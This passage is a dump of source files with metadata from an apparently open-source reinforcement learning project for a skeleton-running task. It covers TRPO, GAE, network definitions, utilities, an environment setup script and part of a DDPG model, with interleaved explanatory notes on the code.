OrnsteinUhlenbeckProcess(\n size=args.n_action,\n theta=args.rp_theta,\n mu=args.rp_mu,\n sigma=args.rp_sigma,\n sigma_min=args.rp_sigma_min)\n else:\n raise NotImplementedError()\n"
},
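Note on `common/random_process.py` above: the exploration noise is an Ornstein-Uhlenbeck process, x_next = x + theta*(mu - x)*dt + sigma*sqrt(dt)*N(0, 1), so consecutive samples are temporally correlated, and sigma can be annealed from `sigma` down to `sigma_min`. A short sketch of drawing one episode of noise and resetting between episodes (the parameter values are illustrative, not the experiment's settings):

    import numpy as np
    from common.random_process import OrnsteinUhlenbeckProcess

    rp = OrnsteinUhlenbeckProcess(theta=0.15, mu=0.0, sigma=0.2, size=18)
    episode_noise = np.array([rp.sample() for _ in range(200)])
    rp.reset_states()              # next episode starts from x0 again
    print(episode_noise.shape)     # (200, 18), one noise vector per step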
{
"alpha_fraction": 0.576606273651123,
"alphanum_fraction": 0.5835049152374268,
"avg_line_length": 38.967079162597656,
"blob_id": "1f0bacffc7413bbe04c8ab5bb5c77580266638f8",
"content_id": "bf3d465286a5a81a189efece4b3a4050515aa9a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9712,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 243,
"path": "/baselines/trpo.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport time\nfrom mpi4py import MPI\nfrom collections import deque\nfrom contextlib import contextmanager\n\nfrom common.logger import Logger\n\nfrom baselines.baselines_common import explained_variance, zipsame, dataset\nimport baselines.baselines_common.tf_util as U\nfrom baselines.baselines_common import colorize\nfrom baselines.baselines_common.mpi_adam import MpiAdam\nfrom baselines.baselines_common.mpi_saver import MpiSaver\nfrom baselines.baselines_common.cg import cg\n\nfrom baselines.trajectories import traj_segment_generator, add_vtarg_and_adv\n\n\ndef learn(env, policy_func, args, *,\n timesteps_per_batch, # what to train on\n max_kl, cg_iters,\n gamma, lam, # advantage estimation\n entcoeff=0.0,\n cg_damping=1e-2,\n vf_stepsize=3e-4,\n vf_iters=3):\n nworkers = MPI.COMM_WORLD.Get_size()\n rank = MPI.COMM_WORLD.Get_rank()\n np.set_printoptions(precision=3)\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space)\n oldpi = policy_func(\"oldpi\", ob_space, ac_space)\n atarg = tf.placeholder(\n dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n entbonus = entcoeff * meanent\n\n vferr = U.mean(tf.square(pi.vpred - ret))\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # advantage * pnew / pold\n surrgain = U.mean(ratio * atarg)\n\n optimgain = surrgain + entbonus\n losses = [optimgain, meankl, entbonus, surrgain, meanent]\n loss_names = [\"optimgain\", \"meankl\", \"entloss\", \"surrgain\", \"entropy\"]\n\n dist = meankl\n\n all_var_list = pi.get_trainable_variables()\n var_list = [v for v in all_var_list if v.name.split(\"/\")[1].startswith(\"pol\")]\n vf_var_list = [v for v in all_var_list if v.name.split(\"/\")[1].startswith(\"vf\")]\n vfadam = MpiAdam(vf_var_list)\n\n policy_var_list = [v for v in all_var_list if v.name.split(\"/\")[0].startswith(\"pi\")]\n saver = MpiSaver(policy_var_list, log_prefix=args.logdir)\n\n get_flat = U.GetFlat(var_list)\n set_from_flat = U.SetFromFlat(var_list)\n klgrads = tf.gradients(dist, var_list)\n flat_tangent = tf.placeholder(dtype=tf.float32, shape=[None], name=\"flat_tan\")\n shapes = [var.get_shape().as_list() for var in var_list]\n start = 0\n tangents = []\n for shape in shapes:\n sz = U.intprod(shape)\n tangents.append(tf.reshape(flat_tangent[start:start + sz], shape))\n start += sz\n gvp = tf.add_n([U.sum(g * tangent) for (g, tangent) in\n zipsame(klgrads, tangents)]) # pylint: disable=E1111\n fvp = U.flatgrad(gvp, var_list)\n\n assign_old_eq_new = U.function(\n [], [],\n updates=[tf.assign(oldv, newv)\n for (oldv, newv) in\n zipsame(oldpi.get_variables(), pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg], losses)\n compute_lossandgrad = U.function([ob, ac, atarg], losses + [U.flatgrad(optimgain, var_list)])\n compute_fvp = U.function([flat_tangent, ob, ac, atarg], fvp)\n compute_vflossandgrad = U.function([ob, ret], U.flatgrad(vferr, vf_var_list))\n\n @contextmanager\n def timed(msg):\n if rank == 0:\n print(colorize(msg, color='magenta'))\n tstart = time.time()\n yield\n print(colorize(\"done in %.3f seconds\" % (time.time() - tstart), 
color='magenta'))\n else:\n yield\n\n def allmean(x):\n assert isinstance(x, np.ndarray)\n out = np.empty_like(x)\n MPI.COMM_WORLD.Allreduce(x, out, op=MPI.SUM)\n out /= nworkers\n return out\n\n U.initialize()\n saver.restore(restore_from=args.restore_actor_from)\n th_init = get_flat()\n MPI.COMM_WORLD.Bcast(th_init, root=0)\n set_from_flat(th_init)\n vfadam.sync()\n print(\"Init param sum\", th_init.sum(), flush=True)\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, args, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=40) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=40) # rolling buffer for episode rewards\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n logger = Logger(args.logdir)\n\n while time.time() - tstart < 86400 * args.max_train_days:\n # logger.log(\"********** Iteration %i ************\" % iters_so_far)\n meanlosses = [0] * len(loss_names)\n with timed(\"sampling\"):\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam)\n\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n\n if hasattr(pi, \"ret_rms\"): pi.ret_rms.update(tdlamret)\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n segargs = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"]\n fvpargs = [arr[::5] for arr in segargs]\n\n def fisher_vector_product(p):\n return allmean(compute_fvp(p, *fvpargs)) + cg_damping * p\n\n assign_old_eq_new() # set old parameter values to new parameter values\n with timed(\"computegrad\"):\n *lossbefore, g = compute_lossandgrad(*segargs)\n lossbefore = allmean(np.array(lossbefore))\n g = allmean(g)\n if np.allclose(g, 0):\n pass\n # logger.log(\"Got zero gradient. not updating\")\n else:\n with timed(\"cg\"):\n stepdir = cg(fisher_vector_product, g, cg_iters=cg_iters, verbose=rank == 0)\n assert np.isfinite(stepdir).all()\n shs = .5 * stepdir.dot(fisher_vector_product(stepdir))\n lm = np.sqrt(shs / max_kl)\n # logger.log(\"lagrange multiplier:\", lm, \"gnorm:\", np.linalg.norm(g))\n fullstep = stepdir / lm\n expectedimprove = g.dot(fullstep)\n surrbefore = lossbefore[0]\n stepsize = 1.0\n thbefore = get_flat()\n for _ in range(10):\n thnew = thbefore + fullstep * stepsize\n set_from_flat(thnew)\n meanlosses = surr, kl, *_ = allmean(np.array(compute_losses(*segargs)))\n improve = surr - surrbefore\n # logger.log(\"Expected: %.3f Actual: %.3f\" % (expectedimprove, improve))\n # if not np.isfinite(meanlosses).all():\n # logger.log(\"Got non-finite value of losses -- bad!\")\n # elif kl > max_kl * 1.5:\n # logger.log(\"violated KL constraint. shrinking step.\")\n # elif improve < 0:\n # logger.log(\"surrogate didn't improve. 
shrinking step.\")\n # else:\n # logger.log(\"Stepsize OK!\")\n # break\n stepsize *= .5\n else:\n # logger.log(\"couldn't compute a good step\")\n set_from_flat(thbefore)\n if nworkers > 1 and iters_so_far % 20 == 0:\n paramsums = MPI.COMM_WORLD.allgather(\n (thnew.sum(), vfadam.getflat().sum())) # list of tuples\n assert all(np.allclose(ps, paramsums[0]) for ps in paramsums[1:])\n\n with timed(\"vf\"):\n for _ in range(vf_iters):\n for (mbob, mbret) in dataset.iterbatches((seg[\"ob\"], seg[\"tdlamret\"]),\n include_final_partial_batch=False,\n batch_size=64):\n g = allmean(compute_vflossandgrad(mbob, mbret))\n vfadam.update(g, vf_stepsize)\n\n saver.sync()\n\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far += 1\n\n # Logging\n logger.scalar_summary(\"episodes\", len(lens), iters_so_far)\n\n for (lossname, lossval) in zip(loss_names, meanlosses):\n logger.scalar_summary(lossname, lossval, episodes_so_far)\n\n logger.scalar_summary(\"ev_tdlam_before\", explained_variance(vpredbefore, tdlamret), episodes_so_far)\n\n logger.scalar_summary(\"step\", np.mean(lenbuffer), episodes_so_far)\n logger.scalar_summary(\"reward\", np.mean(rewbuffer), episodes_so_far)\n logger.scalar_summary(\"best reward\", np.max(rewbuffer), episodes_so_far)\n\n elapsed_time = time.time() - tstart\n\n logger.scalar_summary(\n \"episode per minute\",\n episodes_so_far / elapsed_time * 60,\n episodes_so_far)\n logger.scalar_summary(\n \"step per second\",\n timesteps_so_far / elapsed_time,\n episodes_so_far)\n\n\ndef flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n"
},
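Note on `trpo.py` above: the core update in `learn` solves F*stepdir = g by conjugate gradient, rescales the step so the quadratic KL estimate 0.5 * s^T F s equals `max_kl`, then backtracks with `stepsize *= .5` until the surrogate improves and the measured KL stays in bounds. The rescaling is just the `shs`/`lm` arithmetic; a toy check of it (the stand-in Fisher matrix below is made up):

    import numpy as np

    max_kl = 0.01
    s = np.array([0.3, -0.1])          # pretend CG output
    F = np.diag([2.0, 5.0])            # stand-in Fisher matrix
    shs = 0.5 * s @ F @ s
    fullstep = s / np.sqrt(shs / max_kl)
    print(0.5 * fullstep @ F @ fullstep)   # == max_kl up to float error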
{
"alpha_fraction": 0.5174506902694702,
"alphanum_fraction": 0.5349013805389404,
"avg_line_length": 30.380952835083008,
"blob_id": "e11b5b4d67e574f81964dac1e5c7d58363d700c6",
"content_id": "ab619c93cc6f68cdb4aef8d1154b6503aa948d6b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1318,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 42,
"path": "/common/nets.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\nfrom itertools import tee\n\nimport torch\nimport torch.nn as nn\n\nfrom common.modules.LayerNorm import LayerNorm\n\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\nclass LinearNet(nn.Module):\n def __init__(self, layers, activation=torch.nn.ELU,\n layer_norm=False, linear_layer=nn.Linear):\n super(LinearNet, self).__init__()\n self.input_shape = layers[0]\n self.output_shape = layers[-1]\n\n if layer_norm:\n layer_fn = lambda layer: [\n (\"linear_{}\".format(layer[0]), linear_layer(layer[1][0], layer[1][1])),\n (\"layer_norm_{}\".format(layer[0]), LayerNorm(layer[1][1])),\n (\"act_{}\".format(layer[0]), activation())]\n else:\n layer_fn = lambda layer: [\n (\"linear_{}\".format(layer[0]), linear_layer(layer[1][0], layer[1][1])),\n (\"act_{}\".format(layer[0]), activation())]\n\n self.net = torch.nn.Sequential(\n OrderedDict([\n x for y in map(\n lambda layer: layer_fn(layer),\n enumerate(pairwise(layers))) for x in y]))\n\n def forward(self, x):\n x = self.net.forward(x)\n return x\n"
},
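Note on `common/nets.py` above: `LinearNet` builds an MLP from a flat size list. `pairwise` turns `[in, h1, out]` into `(in, h1), (h1, out)`, and each pair becomes Linear (plus optional LayerNorm) followed by the activation, ELU by default. A usage sketch (sizes are arbitrary, and it assumes the repo's `common.modules.LayerNorm` is importable under a torch version contemporary with this code):

    import torch
    from common.nets import LinearNet

    net = LinearNet([41, 64, 32], layer_norm=True)  # 41 inputs -> 64 -> 32
    x = torch.randn(8, 41)                          # batch of 8 observations
    print(net(x).shape)                             # torch.Size([8, 32])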
{
"alpha_fraction": 0.5784666538238525,
"alphanum_fraction": 0.5881538987159729,
"avg_line_length": 37.031578063964844,
"blob_id": "4d280e3d4217bb097c7105362cc9dbb38bbac223",
"content_id": "bf39868f06ab74ef9c5e588bf832137d7041c8d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3613,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 95,
"path": "/baselines/nets.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport baselines.baselines_common.tf_util as U\nfrom baselines.baselines_common.mpi_running_mean_std import RunningMeanStd\nfrom baselines.baselines_common.distributions import make_pdtype, DiagGaussianPdType, BernoulliPdType\n\n\ndef mlp_block(x, name, num_hid_layers, hid_size, activation_fn=tf.nn.tanh):\n with tf.variable_scope(name_or_scope=name):\n for i in range(num_hid_layers):\n x = U.dense(\n x, hid_size,\n name=\"fc%i\" % (i + 1), weight_init=U.normc_initializer(1.0))\n x = activation_fn(x)\n return x\n\n\ndef feature_net(x, name, num_hid_layers, hid_size, activation_fn=tf.nn.tanh):\n with tf.variable_scope(name_or_scope=name):\n x = mlp_block(\n x, name=\"mlp\",\n hid_size=hid_size, num_hid_layers=num_hid_layers, activation_fn=activation_fn)\n return x\n\n\nclass Actor(object):\n def __init__(self, name, *args, **kwargs):\n with tf.variable_scope(name):\n self._init(*args, **kwargs)\n self.scope = tf.get_variable_scope().name\n\n def _init(self, ob_space, ac_space, hid_size, num_hid_layers, gaussian_fixed_var=True, noise_type=None):\n if noise_type == \"gaussian\":\n self.pdtype = pdtype = DiagGaussianPdType(ac_space.shape[0])\n else:\n self.pdtype = pdtype = make_pdtype(ac_space)\n\n ob = U.get_placeholder(\n name=\"ob\", dtype=tf.float32,\n shape=[None] + list(ob_space.shape))\n\n with tf.variable_scope(\"obfilter\"):\n self.ob_rms = RunningMeanStd(shape=ob_space.shape)\n obz = (ob - self.ob_rms.mean) / self.ob_rms.std\n obz = tf.clip_by_value(obz, -5.0, 5.0)\n\n # critic net (value network)\n last_out = feature_net(\n obz, name=\"vf\",\n num_hid_layers=num_hid_layers, hid_size=hid_size,\n activation_fn=tf.nn.tanh)\n self.vpred = U.dense(\n last_out, 1,\n name=\"vf_final\", weight_init=U.normc_initializer(1.0))[:, 0]\n\n # actor net (policy network)\n last_out = feature_net(\n obz, name=\"pol\",\n num_hid_layers=num_hid_layers, hid_size=hid_size,\n activation_fn=tf.nn.tanh)\n\n if gaussian_fixed_var and isinstance(self.pdtype, DiagGaussianPdType):\n mean = U.dense(\n last_out, pdtype.param_shape()[0] // 2,\n name=\"pol_final\", weight_init=U.normc_initializer(0.01))\n logstd = tf.get_variable(\n name=\"logstd\", shape=[1, pdtype.param_shape()[0] // 2],\n initializer=tf.zeros_initializer())\n pdparam = U.concatenate([mean, mean * 0.0 + logstd], axis=1)\n else:\n pdparam = U.dense(\n last_out, pdtype.param_shape()[0],\n name=\"pol_final\", weight_init=U.normc_initializer(0.01))\n\n # pd - probability distribution\n self.pd = pdtype.pdfromflat(pdparam)\n\n self.state_in = []\n self.state_out = []\n\n stochastic = tf.placeholder(dtype=tf.bool, shape=())\n ac = U.switch(stochastic, self.pd.sample(), self.pd.mode())\n self._act = U.function([stochastic, ob], [ac, self.vpred])\n\n def act(self, stochastic, ob):\n ac1, vpred1 = self._act(stochastic, ob[None])\n return ac1[0], vpred1[0]\n\n def get_variables(self):\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)\n\n def get_trainable_variables(self):\n return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)\n\n def get_initial_state(self):\n return []\n"
},
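Note on `baselines/nets.py` above: the `Actor` standardizes observations with a running mean/std and clips to +/-5 before the tanh MLP (`obz = tf.clip_by_value((ob - self.ob_rms.mean) / self.ob_rms.std, -5.0, 5.0)`), which keeps badly scaled early inputs from saturating the network. The same transform in plain numpy (the numbers are illustrative):

    import numpy as np

    mean = np.array([0.2, -1.0])       # running statistics
    std = np.array([0.5, 2.0])
    ob = np.array([10.0, -1.5])
    obz = np.clip((ob - mean) / std, -5.0, 5.0)
    print(obz)                         # [ 5.   -0.25]; feature 0 hit the clip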
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.571860134601593,
"avg_line_length": 25.340909957885742,
"blob_id": "a8d2da6bec9c24519ae021eee038debda0129a5d",
"content_id": "ff4cf6ef09e6f930f61bec3e82331d1268578818",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2317,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 88,
"path": "/common/misc_util.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport random\nimport numpy as np\n\n\ndef create_if_need(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef boolean_flag(parser, name, default=False, help=None):\n \"\"\"Add a boolean flag to argparse parser.\n\n Parameters\n ----------\n parser: argparse.Parser\n parser to add the flag to\n name: str\n --<name> will enable the flag, while --no-<name> will disable it\n default: bool or None\n default value of the flag\n help: str\n help string for the flag\n \"\"\"\n dest = name.replace('-', '_')\n parser.add_argument(\"--\" + name, action=\"store_true\", default=default, dest=dest, help=help)\n parser.add_argument(\"--no-\" + name, action=\"store_false\", dest=dest)\n\n\ndef str2params(string, delimeter=\"-\"):\n try:\n result = list(map(int, string.split(delimeter)))\n except:\n result = None\n return result\n\n\ndef set_global_seeds(i):\n try:\n import torch\n except ImportError:\n pass\n else:\n torch.manual_seed(i)\n try:\n import tensorflow as tf\n except ImportError:\n pass\n else:\n tf.set_random_seed(i)\n np.random.seed(i)\n random.seed(i)\n\n\ndef query_yes_no(question, default=\"no\"):\n \"\"\"Ask a yes/no question via input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits <Enter>.\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is True for \"yes\" or False for \"no\".\n \"\"\"\n valid = {\n \"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False\n }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")"
},
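Note on `common/misc_util.py` above: `boolean_flag` registers a paired `--name` / `--no-name` switch writing to one `dest`, so the last occurrence on the command line wins. A usage sketch:

    import argparse
    from common.misc_util import boolean_flag

    parser = argparse.ArgumentParser()
    boolean_flag(parser, "layer-norm", default=True, help="use LayerNorm")

    print(parser.parse_args([]).layer_norm)                    # True
    print(parser.parse_args(["--no-layer-norm"]).layer_norm)   # False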
{
"alpha_fraction": 0.8388625383377075,
"alphanum_fraction": 0.8388625383377075,
"avg_line_length": 51.75,
"blob_id": "fa94bca5ad274f684acec13b35f7b0195eafa9bc",
"content_id": "a07d7dfc6af1a4630b4545bea05caab41974cdd4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 4,
"path": "/baselines/baselines_common/__init__.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from baselines.baselines_common.console_util import *\nfrom baselines.baselines_common.dataset import Dataset\nfrom baselines.baselines_common.math_util import *\nfrom baselines.baselines_common.misc_util import *\n"
},
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.704081654548645,
"avg_line_length": 41.14285659790039,
"blob_id": "01702e2e038e1c03b1718c3e3413bc370f322fbd",
"content_id": "f3070d069eca1db0217d61cbaa51f7a468b59c45",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 294,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 7,
"path": "/setup_env_mpi.sh",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nconda upgrade pip -y && \\\n\tconda install -c conda-forge lapack git -y && \\\n\tconda install ipython libgcc -y && \\\n\tconda install pytorch torchvision -c soumith -y && \\\n\tpip install tensorflow==1.3.0 gym mpi4py && \\\n\tpip install git+https://github.com/stanfordnmbl/osim-rl.git"
},
{
"alpha_fraction": 0.5508595705032349,
"alphanum_fraction": 0.560171902179718,
"avg_line_length": 35.73684310913086,
"blob_id": "90c36f5fe08f072ee8869930a1868f916d52de66",
"content_id": "47482b065123f843cb0dcb983bcf1b94655242e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2792,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 76,
"path": "/baselines/trajectories.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef traj_segment_generator(pi, env, args, horizon, stochastic):\n # Initialize state variables\n t = 0\n ac = env.action_space.sample() # not used, just so we have the datatype\n new = True # marks if we're on first timestep of an episode\n ob = env.reset(difficulty=args.difficulty)\n\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n ep_rets = [] # returns of completed episodes in this segment\n ep_lens = [] # lengths of ...\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n acs = np.array([ac for _ in range(horizon)])\n prevacs = acs.copy()\n\n while True:\n prevac = ac\n ac, vpred = pi.act(stochastic, ob)\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\": obs, \"rew\": rews, \"vpred\": vpreds, \"new\": news,\n \"ac\": acs, \"prevac\": prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\": ep_rets, \"ep_lens\": ep_lens}\n # @TODO: TRPO & PPO implementation diff\n # _, vpred = pi.act(stochastic, ob) # @TODO: uncomment??? IMPORTANT!!\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_lens = []\n i = t % horizon\n obs[i] = ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n\n ob, rew, new, _ = env.step(ac)\n rews[i] = rew\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_len = 0\n ob = env.reset(difficulty=args.difficulty)\n t += 1\n\n\ndef add_vtarg_and_adv(seg, gamma, lam):\n \"\"\"\n Compute target value using TD(lambda) estimator, and advantage with GAE(lambda)\n \"\"\"\n # last element is only used for last vtarg, but we already zeroed it if last new = 1\n new = np.append(seg[\"new\"], 0)\n vpred = np.append(seg[\"vpred\"], seg[\"nextvpred\"])\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n nonterminal = 1 - new[t + 1]\n delta = rew[t] + gamma * vpred[t + 1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n seg[\"tdlamret\"] = seg[\"adv\"] + seg[\"vpred\"]\n"
},
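Note on `trajectories.py` above: `add_vtarg_and_adv` is GAE(lambda) run backwards over a segment, delta_t = r_t + gamma*V_{t+1}*(1 - done_{t+1}) - V_t and A_t = delta_t + gamma*lambda*(1 - done_{t+1})*A_{t+1}, with the TD(lambda) value target recovered as A_t + V_t. A standalone numeric sketch of the same recursion (rewards and values below are made up):

    import numpy as np

    gamma, lam = 0.99, 0.95
    rew = np.array([1.0, 0.0, 1.0])
    vpred = np.array([0.5, 0.4, 0.3, 0.2])  # last entry bootstraps V(s_T)
    new = np.array([0, 0, 0, 0])            # no episode boundary in segment

    adv = np.zeros(3)
    lastgaelam = 0.0
    for t in reversed(range(3)):
        nonterminal = 1 - new[t + 1]
        delta = rew[t] + gamma * vpred[t + 1] * nonterminal - vpred[t]
        adv[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam
    vtarg = adv + vpred[:3]                  # TD(lambda) return targets
    print(adv, vtarg)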
{
"alpha_fraction": 0.5945460796356201,
"alphanum_fraction": 0.6010305881500244,
"avg_line_length": 35.20964431762695,
"blob_id": "b7503a2ad99fbac6d35b0afb356a98a85d08b251",
"content_id": "d23110dd58f9ed2dabea274ef1e961deb776ad07",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17272,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 477,
"path": "/ddpg/model.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import random\nimport numpy as np\nimport torch\nimport queue as py_queue\nimport time\nimport torch.nn as nn\nfrom pprint import pprint\n\nfrom ddpg.nets import Actor, Critic\nfrom common.torch_util import to_numpy, to_tensor, soft_update\nfrom common.misc_util import create_if_need, set_global_seeds\nfrom common.logger import Logger\nfrom common.buffers import create_buffer\nfrom common.loss import create_loss, create_decay_fn\nfrom common.env_wrappers import create_env\nfrom common.random_process import create_random_process\n\n\ndef create_model(args):\n actor = Actor(\n args.n_observation, args.n_action, args.actor_layers,\n activation=args.actor_activation,\n layer_norm=args.actor_layer_norm,\n parameters_noise=args.actor_parameters_noise,\n parameters_noise_factorised=args.actor_parameters_noise_factorised,\n last_activation=nn.Tanh)\n critic = Critic(\n args.n_observation, args.n_action, args.critic_layers,\n activation=args.critic_activation,\n layer_norm=args.critic_layer_norm,\n parameters_noise=args.critic_parameters_noise,\n parameters_noise_factorised=args.critic_parameters_noise_factorised)\n\n pprint(actor)\n pprint(critic)\n\n return actor, critic\n\n\ndef create_act_update_fns(actor, critic, target_actor, target_critic, args):\n actor_optim = torch.optim.Adam(actor.parameters(), lr=args.actor_lr)\n critic_optim = torch.optim.Adam(critic.parameters(), lr=args.critic_lr)\n\n criterion = create_loss(args)\n\n low_action_boundary = -1.\n high_action_boundary = 1.\n\n def act_fn(observation, noise=0):\n nonlocal actor\n action = to_numpy(actor(to_tensor(np.array([observation], dtype=np.float32)))).squeeze(0)\n action += noise\n action = np.clip(action, low_action_boundary, high_action_boundary)\n return action\n\n def update_fn(\n observations, actions, rewards, next_observations, dones, weights,\n actor_lr=1e-4, critic_lr=1e-3):\n nonlocal actor, critic, target_actor, target_critic, actor_optim, critic_optim\n\n if hasattr(args, \"flip_states\"):\n observations_flip = args.flip_states(observations)\n next_observations_flip = args.flip_states(next_observations)\n actions_flip = np.zeros_like(actions)\n actions_flip[:, :args.n_action // 2] = actions[:, args.n_action // 2:]\n actions_flip[:, args.n_action // 2:] = actions[:, :args.n_action // 2]\n\n observations = np.concatenate((observations, observations_flip))\n actions = np.concatenate((actions, actions_flip))\n rewards = np.tile(rewards.ravel(), 2)\n next_observations = np.concatenate((next_observations, next_observations_flip))\n dones = np.tile(dones.ravel(), 2)\n\n dones = dones[:, None].astype(np.bool)\n rewards = rewards[:, None].astype(np.float32)\n\n dones = to_tensor(np.invert(dones).astype(np.float32))\n rewards = to_tensor(rewards)\n weights = to_tensor(weights, requires_grad=False)\n\n next_v_values = target_critic(\n to_tensor(next_observations, volatile=True),\n target_actor(to_tensor(next_observations, volatile=True)),\n )\n next_v_values.volatile = False\n\n reward_predicted = dones * args.gamma * next_v_values\n td_target = rewards + reward_predicted\n\n # Critic update\n critic.zero_grad()\n\n v_values = critic(to_tensor(observations), to_tensor(actions))\n value_loss = criterion(v_values, td_target, weights=weights)\n value_loss.backward()\n\n torch.nn.utils.clip_grad_norm(critic.parameters(), args.grad_clip)\n for param_group in critic_optim.param_groups:\n param_group[\"lr\"] = critic_lr\n\n critic_optim.step()\n\n # Actor update\n actor.zero_grad()\n\n policy_loss = -critic(\n 
